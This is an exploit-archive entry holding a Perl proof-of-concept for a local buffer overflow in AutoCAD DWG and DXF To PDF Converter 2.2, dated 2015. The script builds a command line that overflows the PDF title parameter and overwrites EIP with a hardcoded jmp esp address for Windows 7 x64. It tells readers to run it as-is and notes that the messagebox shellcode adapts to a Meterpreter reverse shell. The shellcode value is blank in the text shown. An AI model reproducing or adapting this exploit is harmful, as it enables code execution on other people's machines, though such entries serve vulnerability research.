AutoCAD DWG and DXF To PDF Converter 2.2 – Local Buffer Overflow

  • 作者: Robbie Corley
    日期: 2015-09-06
  • 类别:
  • 来源:
  • #*************************************************************************************************************
    # Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow
    # Date: 9-5-2015
    # Software Link:
    # Exploit Author: Robbie Corley
    # Contact:
    # Website: 
    # CVE: 
    # Category: Local Exploit
    # Description:
    # The title parameter passed into the program that specifies the title of the converted PDF is vulnerable to a buffer overflow.
    # This can be exploited using EIP direct overwrite, SEH bypass, and ROP.
    # EIP was easier and afforded more universal exploitation so I went that route after SEH bypass limited the exploit's universal OS compatibility 
    # Enjoy!(Proofs included)
    # Instructions:Run this as-is (if on x64 platform) and hit the [try] button when the program opens.
    #standard messagebox shellcode.
    #Adapts readily to windows/meterpreter/reverse_tcp using msfvenom --smallest
    my $shellcode =
    open(myfile,'>crasher.dwf'); #generate the dummy DWF file
    print myfile "yattayattayatta"; #gibberish to go in file
    close (myfile); #close the file
    $sploit=pack('V',0x100126db); #jmp esp specific to Windows 7 x64 [found within the packed section of the executable :) ]
    $cmd='"C:\\Program Files (x86)\\AutoCAD DWG and DXF To PDF Converter v2.2\\dwg2pdf.exe"'; #change this if you are on a 32-bit based processor
    $cmd .= $sploit;
    $cmd .= $shellcode;
    $cmd .= '" -i crasher.dwf -o test.pdf'; # append our arguments to the end